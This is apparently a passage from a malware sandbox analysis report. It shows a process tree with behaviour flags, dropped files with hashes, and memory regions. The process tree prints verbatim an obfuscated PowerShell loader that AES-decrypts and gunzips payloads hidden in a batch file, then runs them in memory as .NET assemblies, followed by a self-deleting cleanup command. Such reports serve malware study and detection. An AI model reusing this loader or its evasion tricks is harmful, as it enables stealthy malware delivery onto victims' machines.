              • Suspicious use of AdjustPrivilegeToken
              PID:2640
      • C:\Windows\SYSTEM32\cmd.exe
        C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\tqnyya.bat"
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:1320
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Roaming\tqnyya.bat
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1340
          • C:\Users\Admin\AppData\Roaming\tqnyya.bat.exe
            "C:\Users\Admin\AppData\Roaming\tqnyya.bat.exe" -w hidden -c $ZiYB='TWHQYraWHQYnsWHQYfoWHQYrmFiWHQYnalWHQYBloWHQYckWHQY'.Replace('WHQY', '');$TWWf='CreWHQYateWHQYDeWHQYcryWHQYptWHQYorWHQY'.Replace('WHQY', '');$JFEq='LoWHQYadWHQY'.Replace('WHQY', '');$PgsW='GetWHQYCuWHQYrWHQYreWHQYntWHQYPrWHQYoWHQYceWHQYssWHQY'.Replace('WHQY', '');$tNsL='LaWHQYstWHQY'.Replace('WHQY', '');$GjzR='MaiWHQYnWHQYModuWHQYleWHQY'.Replace('WHQY', '');$aRAn='SpWHQYlitWHQY'.Replace('WHQY', '');$TNHv='IWHQYnWHQYvokWHQYeWHQY'.Replace('WHQY', '');$QZWA='EntWHQYrWHQYyPoWHQYintWHQY'.Replace('WHQY', '');$vNAk='FroWHQYmBaWHQYsWHQYe6WHQY4SWHQYtriWHQYngWHQY'.Replace('WHQY', '');$UYdq='ReWHQYaWHQYdLiWHQYnWHQYeWHQYsWHQY'.Replace('WHQY', '');$JZFz='ChWHQYangWHQYeWHQYExtWHQYensiWHQYoWHQYnWHQY'.Replace('WHQY', '');function swdxJ($huXUQ){$dLULt=[System.Security.Cryptography.Aes]::Create();$dLULt.Mode=[System.Security.Cryptography.CipherMode]::CBC;$dLULt.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$dLULt.Key=[System.Convert]::$vNAk('g+qN2trIRo/tbHFrQCd/eQDgIirzmSlbfVKkYlD3YWc=');$dLULt.IV=[System.Convert]::$vNAk('eff0gny3xfxcI+yMk6XV2Q==');$lfKNS=$dLULt.$TWWf();$QwlmH=$lfKNS.$ZiYB($huXUQ,0,$huXUQ.Length);$lfKNS.Dispose();$dLULt.Dispose();$QwlmH;}function ktBmv($huXUQ){$NioEV=New-Object System.IO.MemoryStream(,$huXUQ);$xipLu=New-Object System.IO.MemoryStream;$BScFk=New-Object System.IO.Compression.GZipStream($NioEV,[IO.Compression.CompressionMode]::Decompress);$BScFk.CopyTo($xipLu);$BScFk.Dispose();$NioEV.Dispose();$xipLu.Dispose();$xipLu.ToArray();}$zaZHN=[System.Linq.Enumerable]::$tNsL([System.IO.File]::$UYdq([System.IO.Path]::$JZFz([System.Diagnostics.Process]::$PgsW().$GjzR.FileName, $null)));$GGCVp=$zaZHN.Substring(2).$aRAn(':');$GwZBd=ktBmv (swdxJ ([Convert]::$vNAk($GGCVp[0])));$gptFX=ktBmv (swdxJ ([Convert]::$vNAk($GGCVp[1])));[System.Reflection.Assembly]::$JFEq([byte[]]$gptFX).$QZWA.$TNHv($null,$null);[System.Reflection.Assembly]::$JFEq([byte[]]$GwZBd).$QZWA.$TNHv($null,$null);
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4652
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(4652);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:752

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        f41839a3fe2888c8b3050197bc9a0a05

        SHA1

        0798941aaf7a53a11ea9ed589752890aee069729

        SHA256

        224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

        SHA512

        2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

        Filesize

        53KB

        MD5

        06ad34f9739c5159b4d92d702545bd49

        SHA1

        9152a0d4f153f3f40f7e606be75f81b582ee0c17

        SHA256

        474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

        SHA512

        c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        2238871af228384f4b8cdc65117ba9f1

        SHA1

        2a200725f1f32e5a12546aa7fd7a8c5906757bd1

        SHA256

        daa246f73567ad176e744abdb82d991dd8cffe0e2d847d2feefeb84f7fa5f882

        SHA512

        1833d508fdbe2b8722b787bfc0c1848a5bcdeb7ec01e94158d78e9e6ceb397a2515d88bb8ca4ec1a810263fc900b5b1ea1d788aa103967ed61436e617fab47bf

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        560B

        MD5

        47eba8a13be6a3eff8eca194f9969071

        SHA1

        acd481839a19d948bf65d8e30e81b286c3874b2b

        SHA256

        00db64c86eae688cf755ac26c07a930544c92cc2a25bb8b3e31380628732d8a7

        SHA512

        0a0c36891f81d8809be0a5c9e76bf140069e7a161a79ce9de68c5f7fc3101df0ba4860582133d01a0aabb1248189a9920b4e453d3f95a468d69987bfb4c3c1b3

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        64B

        MD5

        1a11402783a8686e08f8fa987dd07bca

        SHA1

        580df3865059f4e2d8be10644590317336d146ce

        SHA256

        9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

        SHA512

        5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rn4fzxvq.5gy.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\tqnyya.bat

        Filesize

        74KB

        MD5

        eb336ada634ab05e0ee2319de53f28d9

        SHA1

        6b90b17327236357996c2cda2e341a59bbe1177f

        SHA256

        ac9385e93103cf61717de999cb0e9ad035d311af09f0c02b1f46ef99fb5fa793

        SHA512

        dac81bce58bc4c76acdb8e0e3c1489cd822cd65de5aa7a5b1b61c2f11e85fce52a487cabdf6ceff6d78093fa5e9237f309f903cb32637fac062773480c643e95

      • C:\Users\Admin\AppData\Local\Temp\tqnyya.bat.exe

        Filesize

        423KB

        MD5

        c32ca4acfcc635ec1ea6ed8a34df5fac

        SHA1

        f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

        SHA256

        73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

        SHA512

        6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

      • C:\Users\Admin\AppData\Roaming\tqnyya.bat.exe

        Filesize

        442KB

        MD5

        04029e121a0cfa5991749937dd22a1d9

        SHA1

        f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

        SHA256

        9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

        SHA512

        6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

      • memory/64-21-0x00007FFB13A90000-0x00007FFB14551000-memory.dmp

        Filesize

        10.8MB

      • memory/64-43-0x00007FFB13A90000-0x00007FFB14551000-memory.dmp

        Filesize

        10.8MB

      • memory/64-11-0x0000022A57D00000-0x0000022A57D22000-memory.dmp

        Filesize

        136KB

      • memory/64-22-0x0000022A6FEE0000-0x0000022A6FEF0000-memory.dmp

        Filesize

        64KB

      • memory/64-23-0x0000022A6FEE0000-0x0000022A6FEF0000-memory.dmp

        Filesize

        64KB

      • memory/752-176-0x00007FFB13740000-0x00007FFB14201000-memory.dmp

        Filesize

        10.8MB

      • memory/752-190-0x00007FFB13740000-0x00007FFB14201000-memory.dmp

        Filesize

        10.8MB

      • memory/788-108-0x0000000005490000-0x00000000054A0000-memory.dmp

        Filesize

        64KB

      • memory/788-62-0x0000000005490000-0x00000000054A0000-memory.dmp

        Filesize

        64KB

      • memory/788-84-0x0000000007910000-0x0000000007922000-memory.dmp

        Filesize

        72KB

      • memory/788-86-0x0000000007EC0000-0x0000000007ED6000-memory.dmp

        Filesize

        88KB

      • memory/788-111-0x0000000005490000-0x00000000054A0000-memory.dmp

        Filesize

        64KB

      • memory/788-112-0x0000000077C01000-0x0000000077D21000-memory.dmp

        Filesize

        1.1MB

      • memory/788-59-0x0000000003370000-0x00000000033A6000-memory.dmp

        Filesize

        216KB

      • memory/788-61-0x0000000005490000-0x00000000054A0000-memory.dmp

        Filesize

        64KB

      • memory/788-60-0x0000000075200000-0x00000000759B0000-memory.dmp

        Filesize

        7.7MB

      • memory/788-109-0x0000000075200000-0x00000000759B0000-memory.dmp

        Filesize

        7.7MB

      • memory/788-63-0x0000000005AD0000-0x00000000060F8000-memory.dmp

        Filesize

        6.2MB

      • memory/788-64-0x0000000005A90000-0x0000000005AB2000-memory.dmp

        Filesize

        136KB

      • memory/788-65-0x0000000006170000-0x00000000061D6000-memory.dmp

        Filesize

        408KB

      • memory/788-75-0x0000000006350000-0x00000000066A4000-memory.dmp

        Filesize

        3.3MB

      • memory/788-77-0x0000000006860000-0x000000000687E000-memory.dmp

        Filesize

        120KB

      • memory/788-78-0x0000000006D10000-0x0000000006D5C000-memory.dmp

        Filesize

        304KB

      • memory/788-79-0x0000000008010000-0x000000000868A000-memory.dmp

        Filesize

        6.5MB

      • memory/788-80-0x0000000006E00000-0x0000000006E1A000-memory.dmp

        Filesize

        104KB

      • memory/788-81-0x00000000077F0000-0x00000000077FA000-memory.dmp

        Filesize

        40KB

      • memory/788-83-0x0000000077C01000-0x0000000077D21000-memory.dmp

        Filesize

        1.1MB

      • memory/1972-121-0x00007FFB13620000-0x00007FFB140E1000-memory.dmp

        Filesize

        10.8MB

      • memory/1972-122-0x00000248384E0000-0x00000248384F0000-memory.dmp

        Filesize

        64KB

      • memory/1972-151-0x00007FFB13620000-0x00007FFB140E1000-memory.dmp

        Filesize

        10.8MB

      • memory/1972-134-0x00007FFB321F0000-0x00007FFB323E5000-memory.dmp

        Filesize

        2.0MB

      • memory/1972-135-0x00007FFB30A20000-0x00007FFB30ADE000-memory.dmp

        Filesize

        760KB

      • memory/1972-123-0x00000248384E0000-0x00000248384F0000-memory.dmp

        Filesize

        64KB

      • memory/2624-24-0x00007FFB13A90000-0x00007FFB14551000-memory.dmp

        Filesize

        10.8MB

      • memory/2624-25-0x000001B837690000-0x000001B8376A0000-memory.dmp

        Filesize

        64KB

      • memory/2624-35-0x000001B849E30000-0x000001B84A0F0000-memory.dmp

        Filesize

        2.8MB

      • memory/2624-39-0x00007FFB13A90000-0x00007FFB14551000-memory.dmp

        Filesize

        10.8MB

      • memory/2640-154-0x00007FFB13620000-0x00007FFB140E1000-memory.dmp

        Filesize

        10.8MB

      • memory/2640-137-0x00007FFB13620000-0x00007FFB140E1000-memory.dmp

        Filesize

        10.8MB

      • memory/2640-138-0x000002993B4C0000-0x000002993B4D0000-memory.dmp

        Filesize

        64KB

      • memory/4108-114-0x0000000005180000-0x0000000005190000-memory.dmp

        Filesize

        64KB

      • memory/4108-115-0x0000000005180000-0x0000000005190000-memory.dmp

        Filesize

        64KB

      • memory/4108-87-0x0000000075200000-0x00000000759B0000-memory.dmp

        Filesize

        7.7MB

      • memory/4108-88-0x0000000005180000-0x0000000005190000-memory.dmp

        Filesize

        64KB

      • memory/4108-89-0x0000000005180000-0x0000000005190000-memory.dmp

        Filesize

        64KB

      • memory/4108-113-0x0000000075200000-0x00000000759B0000-memory.dmp

        Filesize

        7.7MB

      • memory/4652-161-0x00007FFB13740000-0x00007FFB14201000-memory.dmp

        Filesize

        10.8MB

      • memory/4652-162-0x00000251BD990000-0x00000251BD9A0000-memory.dmp

        Filesize

        64KB

      • memory/4652-187-0x00007FFB13740000-0x00007FFB14201000-memory.dmp

        Filesize

        10.8MB

      • memory/4652-174-0x00007FFB30A20000-0x00007FFB30ADE000-memory.dmp

        Filesize

        760KB

      • memory/4652-173-0x00007FFB321F0000-0x00007FFB323E5000-memory.dmp

        Filesize

        2.0MB

      • memory/4932-99-0x0000000075200000-0x00000000759B0000-memory.dmp

        Filesize

        7.7MB

      • memory/4932-50-0x00000000066F0000-0x0000000006756000-memory.dmp

        Filesize

        408KB

      • memory/4932-47-0x0000000006850000-0x0000000006DF4000-memory.dmp

        Filesize

        5.6MB

      • memory/4932-36-0x0000000000400000-0x0000000000410000-memory.dmp

        Filesize

        64KB

      • memory/4932-107-0x0000000002D40000-0x0000000002D50000-memory.dmp

        Filesize

        64KB

      • memory/4932-48-0x0000000006490000-0x0000000006522000-memory.dmp

        Filesize

        584KB

      • memory/4932-46-0x0000000002D40000-0x0000000002D50000-memory.dmp

        Filesize

        64KB

      • memory/4932-49-0x0000000006470000-0x000000000647A000-memory.dmp

        Filesize

        40KB

      • memory/4932-44-0x0000000075200000-0x00000000759B0000-memory.dmp

        Filesize

        7.7MB

      • memory/4932-45-0x00000000054A0000-0x000000000553C000-memory.dmp

        Filesize

        624KB